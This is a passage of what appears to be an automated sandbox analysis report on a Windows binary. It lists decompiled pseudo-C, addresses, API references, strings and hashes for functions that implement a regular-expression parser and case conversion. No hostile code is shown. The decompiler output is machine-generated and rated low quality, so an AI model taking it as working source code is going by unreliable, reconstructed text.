																	 *( *(_t230 + 0xc)) =  *(_t230 - 0x14);
																	_t104 = E00406ED3(_t230 - 0x2c);
																}
															} else {
																_t104 = _t148 - 1;
																if(_t104 == 0) {
																	 *(_t230 - 0xd) = 1;
																	goto L14;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
				return _t104;
			}

0x00408d08
0x00408d12
0x00408d15
0x00408d1a
0x00408d20
0x00408d26
0x00408d2f
0x00408d35
0x00408d3b
0x00408d43
0x00408d48
0x00408d50
0x00408d53
0x00408d57
0x00408d5d
0x00408d60
0x00408d6e
0x00408d72
0x00408d83
0x00408d86
0x00408f53
0x00408f53
0x00000000
0x00408d8c
0x00408d8c
0x00408d8d
0x00408f49
0x00408f49
0x00000000
0x00408d93
0x00408d93
0x00408d94
0x00408f38
0x00408f38
0x00408f3c
0x00000000
0x00408d9a
0x00408d9a
0x00408d9b
0x00408f4f
0x00000000
0x00408da1
0x00408da1
0x00408da2
0x00408f45
0x00000000
0x00408da8
0x00408da8
0x00408da9
0x00408f34
0x00408f34
0x00000000
0x00408daf
0x00408daf
0x00408db0
0x00408dbb
0x00408dcd
0x00408dd8
0x00408ddd
0x00408de5
0x00408de8
0x00408dee
0x00408dfa
0x00408e01
0x00408e07
0x00408e0c
0x00408e1a
0x00408e1e
0x00408e2f
0x00408e32
0x00408e50
0x00408e55
0x00408e67
0x00408e72
0x00408e7d
0x00408e7f
0x00408e7f
0x00408e82
0x00408e87
0x00408e8d
0x00408e99
0x00408ea0
0x00408ea6
0x00408eab
0x00408eb9
0x00408ebd
0x00408ece
0x00408ed1
0x00408ede
0x00408ede
0x00408ee4
0x00408f5c
0x00000000
0x00408ee6
0x00408eee
0x00408ef1
0x00408ef7
0x00408f08
0x00408f0e
0x00408f19
0x00408f22
0x00408f27
0x00408f28
0x00408f2f
0x00000000
0x00408f2f
0x00408ed3
0x00408ed3
0x00408ed4
0x00408eda
0x00000000
0x00408eda
0x00408ed4
0x00408ed1
0x00408e34
0x00408e34
0x00408e35
0x00408e42
0x00408e42
0x00408e45
0x00408f5f
0x00408f63
0x00408f65
0x00408f69
0x00408f71
0x00408f71
0x00408f75
0x00408f8c
0x00408f8f
0x00408f92
0x00408f95
0x00408f9e
0x00408fa4
0x00408faa
0x00408fb1
0x00408fb9
0x00408fc4
0x00408fc8
0x00408fcd
0x00408fcd
0x00408e37
0x00408e37
0x00408e38
0x00408e3e
0x00000000
0x00408e3e
0x00408e38
0x00408e35
0x00408e32
0x00408e01
0x00408db0
0x00408da9
0x00408da2
0x00408d9b
0x00408d94
0x00408d8d
0x00408d86
0x00408d48
0x00408fd8
0x00408fe0

APIs

_EH_prolog.MSVCRT ref: 00408D08
strlen.MSVCRT ref: 00408EFD
_CxxThrowException.MSVCRT(?,004196F8), ref: 00408F2F

Strings

Can't do {n, m} with n > m, xrefs: 00408EF7, 00408EFC, 00408F04

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: Can't do {n, m} with n > m
API String ID: 1214428233-227225803
Opcode ID: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
Instruction ID: 47e776d1a0f71e80584c51c7b8460619ed49745a926705c7366e66a548d0e101
Opcode Fuzzy Hash: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
Instruction Fuzzy Hash: B3919271A0060A9BCF18CF64C554AEEB7B6FB44310F14826EE856A73C0DB78AD51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405EEA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00405EEF
strlen.MSVCRT ref: 00406065
_CxxThrowException.MSVCRT(?,004196F8), ref: 00406096

Part of subcall function 0040A5B8: _EH_prolog.MSVCRT ref: 0040A5BD

Strings

quantifier not expected, xrefs: 0040605F, 00406064, 0040606C

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: H_prolog$ExceptionThrowstrlen
String ID: quantifier not expected
API String ID: 2054561153-3090400379
Opcode ID: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
Instruction ID: 96f9309febd4b26ccc1dd5471e80c689c957bcaa372d40d9e1b63adb595ee9a0
Opcode Fuzzy Hash: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
Instruction Fuzzy Hash: 14912975700206DFCB08DF68C8D49AABBB5FF48340B14856AE916DB382DB38E955CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7A2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
stringCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040D7A2(void* __ecx) {
				intOrPtr* _t33;
				intOrPtr _t34;
				intOrPtr* _t38;
				void* _t45;
				signed int _t46;
				signed int _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr _t68;
				char* _t70;
				signed int _t71;
				void* _t73;

				_t45 = __ecx;
				L004153D0();
				_t64 =  *((intOrPtr*)(_t73 + 0xc));
				_t56 =  *((intOrPtr*)(_t64 + 4));
				_t67 =  *((intOrPtr*)(_t56 + 4));
				_t33 =  *_t67;
				if(_t67 != _t33) {
					while(1) {
						_t71 =  *(_t45 + 8);
						if(_t71 <  *((intOrPtr*)(_t33 + 8))) {
							goto L3;
						}
						 *(_t45 + 8) = _t71 + 1;
						_t33 =  *_t33;
						if( *((intOrPtr*)(_t56 + 4)) != _t33) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				_t34 =  *_t64;
				_t68 =  *((intOrPtr*)(_t34 + 4));
				if(_t68 != 0) {
					_t59 =  *((intOrPtr*)(_t34 + 8)) - _t68 >> 2;
				} else {
					_t59 = 0;
				}
				_t46 =  *(_t45 + 8);
				if(_t46 >= _t59) {
					 *((char*)(_t73 - 0x24)) =  *((intOrPtr*)(_t73 + 0xb));
					 *0x417230(0);
					_t70 = "reference to nonexistent group";
					 *0x417234(_t70, strlen(_t70));
					 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
					_t46 = _t73 - 0x40;
					 *0x417218(_t73 - 0x24);
					_t34 = _t73 - 0x40;
					_push(0x4196f8);
					_push(_t34);
					 *(_t73 - 0x40) = 0x417698;
					L004153FE();
				}
				_t47 = _t46 << 2;
				if( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))) != 0) {
					_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))))) + 0x2c))(_t73 - 0x14, _t64);
					_t38 =  *((intOrPtr*)(_t73 + 8));
					 *_t38 =  *_t49;
					_t50 =  *((intOrPtr*)(_t49 + 4));
				} else {
					_t38 =  *((intOrPtr*)(_t73 + 8));
					_t52 =  *0x417690; // 0x0
					 *_t38 = _t52;
					_t50 =  *0x417694; // 0xffffffff
				}
				 *((intOrPtr*)(_t38 + 4)) = _t50;
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return _t38;
			}

0x0040d7a2
0x0040d7a7
0x0040d7b1
0x0040d7b4
0x0040d7b7
0x0040d7ba
0x0040d7be
0x0040d7c0
0x0040d7c0
0x0040d7c6
0x00000000
0x00000000
0x0040d7c9
0x0040d7cc
0x0040d7d1
0x00000000
0x00000000
0x00000000
0x0040d7d1
0x0040d7c0
0x0040d7d3
0x0040d7d3
0x0040d7d5
0x0040d7da
0x0040d7e5
0x0040d7dc
0x0040d7dc
0x0040d7dc
0x0040d7e8
0x0040d7ed
0x0040d7f7
0x0040d7fa
0x0040d800
0x0040d811
0x0040d817
0x0040d81f
0x0040d822
0x0040d828
0x0040d82b
0x0040d830
0x0040d831
0x0040d838
0x0040d838
0x0040d840
0x0040d847
0x0040d86c
0x0040d86e
0x0040d873
0x0040d875
0x0040d849
0x0040d849
0x0040d84c
0x0040d852
0x0040d854
0x0040d854
0x0040d878
0x0040d880
0x0040d888

APIs

_EH_prolog.MSVCRT ref: 0040D7A7
strlen.MSVCRT ref: 0040D806
_CxxThrowException.MSVCRT(?), ref: 0040D838

Strings

reference to nonexistent group, xrefs: 0040D800, 0040D805, 0040D80D

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: reference to nonexistent group
API String ID: 1214428233-2717939947
Opcode ID: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
Instruction ID: 522e6e50840da4ac399b5e0b3b8a6ae22c3212176d366e94a0c7a72128cb66c6
Opcode Fuzzy Hash: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
Instruction Fuzzy Hash: 4E31D135A00114CFC710DF48C544ADABBF5FF89300B24C0AAE81AAB361C774ED46CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E0040DB46(intOrPtr __ecx, void* __eflags) {
				char* _t25;
				intOrPtr* _t26;
				intOrPtr _t33;
				char* _t34;
				intOrPtr _t39;
				char* _t44;
				char* _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t53;

				L004153D0();
				_push(__ecx);
				_t33 =  *((intOrPtr*)(_t53 + 0xc));
				_t46 =  *((intOrPtr*)(_t53 + 8));
				_t51 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				 *((intOrPtr*)(__ecx + 8)) = _t46;
				 *((intOrPtr*)(__ecx + 0xc)) = _t33;
				 *((intOrPtr*)(__ecx + 0x10)) = _t33 - _t46;
				 *((intOrPtr*)(__ecx)) = 0x418524;
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				 *((intOrPtr*)(_t53 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10))));
				 *(_t53 - 4) = 1;
				_t25 = E0040507F( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10)))), _t33 - _t46);
				_t39 =  *((intOrPtr*)(__ecx + 0xc));
				 *((intOrPtr*)(__ecx + 0x14)) = _t25;
				_t44 = _t25;
				_t26 =  *((intOrPtr*)(__ecx + 8));
				 *((intOrPtr*)(__ecx)) = 0x4184f0;
				 *((intOrPtr*)(_t53 + 8)) = _t39;
				if(_t26 != _t39) {
					do {
						 *_t44 =  *_t26;
						_t44 = _t44 + 1;
						_t26 = _t26 + 1;
					} while (_t26 !=  *((intOrPtr*)(_t53 + 8)));
				}
				if(_t33 != _t46) {
					do {
						 *_t46 =  *0x4172a4( *_t46);
						_t46 = _t46 + 1;
					} while (_t46 != _t33);
				}
				_t34 =  *((intOrPtr*)(_t51 + 0x14));
				_t48 =  *((intOrPtr*)(_t51 + 0x10)) + _t34;
				if(_t48 != _t34) {
					do {
						 *_t34 =  *0x4172ac( *_t34);
						_t34 = _t34 + 1;
					} while (_t34 != _t48);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t51;
			}

0x0040db4b
0x0040db50
0x0040db52
0x0040db57
0x0040db5c
0x0040db60
0x0040db63
0x0040db67
0x0040db6a
0x0040db6d
0x0040db70
0x0040db79
0x0040db7f
0x0040db83
0x0040db87
0x0040db8c
0x0040db8f
0x0040db92
0x0040db94
0x0040db99
0x0040db9f
0x0040dba2
0x0040dba4
0x0040dba6
0x0040dba8
0x0040dba9
0x0040dbaa
0x0040dba4
0x0040dbb1
0x0040dbb3
0x0040dbbd
0x0040dbbf
0x0040dbc2
0x0040dbb3
0x0040dbc5
0x0040dbcb
0x0040dbcf
0x0040dbd1
0x0040dbdb
0x0040dbdd
0x0040dbe0
0x0040dbd1
0x0040dbeb
0x0040dbf3

APIs

_EH_prolog.MSVCRT ref: 0040DB4B
toupper.MSVCRT ref: 0040DBB7
tolower.MSVCRT ref: 0040DBD5

Strings

q@, xrefs: 0040DB70

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: H_prologtolowertoupper
String ID: q@
API String ID: 3817453147-2764676539
Opcode ID: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
Instruction ID: 1cd1e5bdde56281f47441b0658e7e07e847f1fa8a3c8823e6e5bb0bf60c20c5d
Opcode Fuzzy Hash: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
Instruction Fuzzy Hash: 4321C271A007418FCB20CF59C48065AFBF5EF48311B14856FE496D7741C778A844CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040718E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407193
strlen.MSVCRT ref: 004071B3
_CxxThrowException.MSVCRT ref: 004071E5

Strings

sub-expression cannot be quantified, xrefs: 004071AD, 004071B2, 004071BA

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: sub-expression cannot be quantified
API String ID: 1214428233-703565053
Opcode ID: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
Instruction ID: 2ce7878e2e45b983fac23937024426c5bb2166d395f322666b5fa2fe93735dc8
Opcode Fuzzy Hash: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
Instruction Fuzzy Hash: 2A11C231845114AFCB10DF94DC44EEEBB78FF48350F10849EF862A7260DBB85945CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00409027 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00409027(void* __esi) {
				signed int _v4;
				char _v13;
				char _v32;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _t28;

				L004153D0();
				_v32 = _v13;
				 *0x417230(0, __esi);
				_t28 = "recursion sub-expression cannot be quantified";
				 *0x417234(_t28, strlen(_t28));
				_v4 = _v4 & 0x00000000;
				 *0x417218( &_v32);
				_push(0x4196f8);
				_push( &_v60);
				_v60 = 0x417698;
				L004153FE();
				_push(_v64);
				return E0040A9C0( &_v60, _v68, _v64);
			}

0x0040902c
0x0040903d
0x00409040
0x00409046
0x00409057
0x0040905d
0x00409068
0x00409071
0x00409076
0x00409077
0x0040907e
0x00409087
0x00409096

APIs

_EH_prolog.MSVCRT ref: 0040902C
strlen.MSVCRT ref: 0040904C
_CxxThrowException.MSVCRT ref: 0040907E

Strings

recursion sub-expression cannot be quantified, xrefs: 00409046, 0040904B, 00409053

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: recursion sub-expression cannot be quantified
API String ID: 1214428233-1191606697
Opcode ID: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
Instruction ID: 10e607d7a6f2a3e9ba9a672d8d2b0ae7a902c0b6b7616f674ba24b2d4bce1438
Opcode Fuzzy Hash: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
Instruction Fuzzy Hash: 9FF0813684111CFBCF00AB95EC45ADD7B38FF08350F008056F815A6061DBB84644CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 004133FE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004133FE() {
				intOrPtr _t15;
				void* _t27;
				char* _t28;
				void* _t30;

				L004153D0();
				_t15 =  *((intOrPtr*)(_t30 + 0xc));
				if(_t15 ==  *((intOrPtr*)(_t30 + 8))) {
					 *((char*)(_t30 - 0x1c)) =  *((intOrPtr*)(_t30 + 0xf));
					 *0x417230(0, _t27);
					_t28 = "expecting end of character set";
					 *0x417234(_t28, strlen(_t28));
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					 *0x417218(_t30 - 0x1c);
					_t15 = _t30 - 0x38;
					_push(0x4196f8);
					_push(_t15);
					 *((intOrPtr*)(_t30 - 0x38)) = 0x417698;
					L004153FE();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t15;
			}

0x00413403
0x0041340b
0x00413411
0x0041341c
0x0041341f
0x00413425
0x00413436
0x0041343c
0x00413447
0x0041344d
0x00413450
0x00413455
0x00413456
0x0041345d
0x00413462
0x00413466
0x0041346e

APIs

_EH_prolog.MSVCRT ref: 00413403
strlen.MSVCRT ref: 0041342B
_CxxThrowException.MSVCRT(?,004196F8), ref: 0041345D

Strings

expecting end of character set, xrefs: 00413425, 0041342A, 00413432

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: expecting end of character set
API String ID: 1214428233-2681132798
Opcode ID: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
Instruction ID: fb0b6af9fdd803d394df8d1c0f25a948e4417c071c105f155f0c22cdd341b05e
Opcode Fuzzy Hash: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
Instruction Fuzzy Hash: 49014471C41109EFCB01EF94E885BED7B78EF04755F108056F822D7151DBB85685CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004073CC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004073CC() {
				void* _t24;
				char* _t25;
				void* _t27;

				L004153D0();
				 *((char*)(_t27 - 0x20)) =  *((intOrPtr*)(_t27 - 0xd));
				 *0x417230(0, _t24);
				_t25 = "look-ahead assertion cannot be quantified";
				 *0x417234(_t25, strlen(_t25));
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				 *0x417218(_t27 - 0x20);
				_push(0x4196f8);
				_push(_t27 - 0x3c);
				 *((intOrPtr*)(_t27 - 0x3c)) = 0x417698;
				L004153FE();
				return 1;
			}

0x004073d1
0x004073e2
0x004073e5
0x004073eb
0x004073fc
0x00407402
0x0040740d
0x00407416
0x0040741b
0x0040741c
0x00407423
0x0040742b

APIs

_EH_prolog.MSVCRT ref: 004073D1
strlen.MSVCRT ref: 004073F1
_CxxThrowException.MSVCRT ref: 00407423

Strings

look-ahead assertion cannot be quantified, xrefs: 004073EB, 004073F0, 004073F8

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: look-ahead assertion cannot be quantified
API String ID: 1214428233-1240756859
Opcode ID: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
Instruction ID: 1721b6b3a732f0907001ba31f53c3af67a5e291595c0cbf9be71024513a692cd
Opcode Fuzzy Hash: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
Instruction Fuzzy Hash: E2F03035851118ABCB04AB94EC55ADD7B78BF59351F404096F821A2161DFB80549CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 0040267F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00402684
strlen.MSVCRT ref: 004026A4
_CxxThrowException.MSVCRT(?,004194D0), ref: 004026D7

Strings

invalid vector<T> subscript, xrefs: 0040269E, 004026A3, 004026AB

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: invalid vector<T> subscript
API String ID: 1214428233-3016609489
Opcode ID: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
Instruction ID: 7f0d4b690d67eaef1822860b9d25e2d5405d004bbf420f7a3b0005bfa06bd269
Opcode Fuzzy Hash: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
Instruction Fuzzy Hash: E5F03076C45118ABDB04EBE4EC49AED7B78FF18350F0040A6F811A3161DFB85545CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 00403810 Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

tolower.MSVCRT ref: 004039C6
toupper.MSVCRT ref: 004039EB
tolower.MSVCRT ref: 00403A3D
toupper.MSVCRT ref: 00403A8D

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: tolowertoupper
String ID:
API String ID: 1080271956-0
Opcode ID: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
Instruction ID: 36f9c2d77fe6c67efd501578e7725a05c9af3bd086344374b91f15e4db579863
Opcode Fuzzy Hash: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
Instruction Fuzzy Hash: 07A14D71A04205DFCB14CF64C9846AEBFB8BF08316F1481AAE855A7391C778EA45CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041346F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041346F(intOrPtr* _a4, intOrPtr _a8, char _a12) {
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t29;
				signed char _t33;
				signed char _t37;
				signed char _t40;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;

				_t57 = _a4;
				_t56 = _a8;
				_push(_t56);
				_push( *_t57);
				E004133FE();
				_t11 =  *_t57;
				_t33 =  *_t11;
				_t40 = _t33;
				_t59 = _t40 - 0x66;
				if(_t59 > 0) {
					_t41 = _t40 - 0x6e;
					if(_t41 == 0) {
						if(_a12 != 0) {
							_t33 = 0xa;
						}
						L39:
						 *_t57 = _t11 + 1;
						L40:
						return _t33;
					}
					_t42 = _t41 - 4;
					if(_t42 == 0) {
						if(_a12 != 0) {
							_t33 = 0xd;
						}
						goto L39;
					}
					_t44 = _t42;
					if(_t44 == 0) {
						if(_a12 != 0) {
							_t33 = 9;
						}
						goto L39;
					}
					_t46 = _t44;
					if(_t46 == 0) {
						if(_a12 != 0) {
							_t33 = 0xb;
						}
						goto L39;
					}
					if(_t46 != 0) {
						goto L39;
					}
					_t33 = 0;
					 *_t57 = _t11 + 1;
					while(E00402F9A( *((intOrPtr*)( *_t57))) != 0) {
						_t33 = (_t33 << 4) + E00402FBD( *((intOrPtr*)( *_t57)));
						 *_t57 =  *_t57 + 1;
						_push(_t56);
						_push( *_t57);
						E004133FE();
						_t58 = _t58 + 0xc;
					}
					goto L40;
				}
				if(_t59 == 0) {
					if(_a12 != 0) {
						_t33 = 0xc;
					}
					goto L39;
				}
				if(_t40 < 0x30) {
					goto L39;
				}
				if(_t40 <= 0x37) {
					_t33 = _t33 - 0x30;
					 *_t57 = _t11 + 1;
					while(1) {
						_t24 =  *_t57;
						_t50 =  *_t24;
						if(_t50 < 0x30 || _t50 > 0x37) {
							goto L40;
						}
						_push(_t56);
						_t33 = (_t33 - 6 << 3) + _t50;
						_t25 = _t24 + 1;
						_push(_t25);
						 *_t57 = _t25;
						E004133FE();
					}
					goto L40;
				}
				if(_t40 == 0x5c) {
					if(_a12 != 0) {
						_t33 = 0x5c;
					}
					goto L39;
				}
				if(_t40 == 0x61) {
					if(_a12 != 0) {
						_t33 = 7;
					}
					goto L39;
				}
				if(_t40 == 0x63) {
					_t27 = _t11 + 1;
					_push(_t56);
					_push(_t27);
					 *_t57 = _t27;
					E004133FE();
					_t29 =  *_t57;
					_t37 =  *_t29;
					 *_t57 = _t29 + 1;
					if(_t37 >= 0x61 && _t37 <= 0x7a) {
						_t37 =  *0x4172a4(_t37);
					}
					_t33 = _t37 ^ 0x00000040;
					goto L40;
				} else {
					if(_t40 == 0x65) {
						_t33 = 0x1b;
					}
					goto L39;
				}
			}

0x00413474
0x00413478
0x0041347b
0x0041347c
0x0041347e
0x00413483
0x00413487
0x00413489
0x0041348c
0x0041348f
0x00413558
0x0041355b
0x004135c3
0x004135c5
0x004135c5
0x004135c7
0x004135c8
0x004135cb
0x004135d0
0x004135d0
0x0041355d
0x00413560
0x004135b9
0x004135bb
0x004135bb
0x00000000
0x004135b9
0x00413563
0x00413564
0x004135af
0x004135b1
0x004135b1
0x00000000
0x004135af
0x00413567
0x00413568
0x004135a5
0x004135a7
0x004135a7
0x00000000
0x004135a5
0x0041356c
0x00000000
0x00000000
0x0041356f
0x00413571
0x00413573
0x0041358f
0x00413591
0x00413595
0x00413596
0x00413597
0x0041359c
0x0041359c
0x00000000
0x00413573
0x00413495
0x00413552
0x00413554
0x00413554
0x00000000
0x00413552
0x0041349e
0x00000000
0x00000000
0x004134a7
0x0041351c
